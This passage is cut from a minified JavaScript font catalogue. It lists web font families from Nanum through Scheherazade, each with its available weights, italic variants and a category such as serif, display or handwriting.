Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade 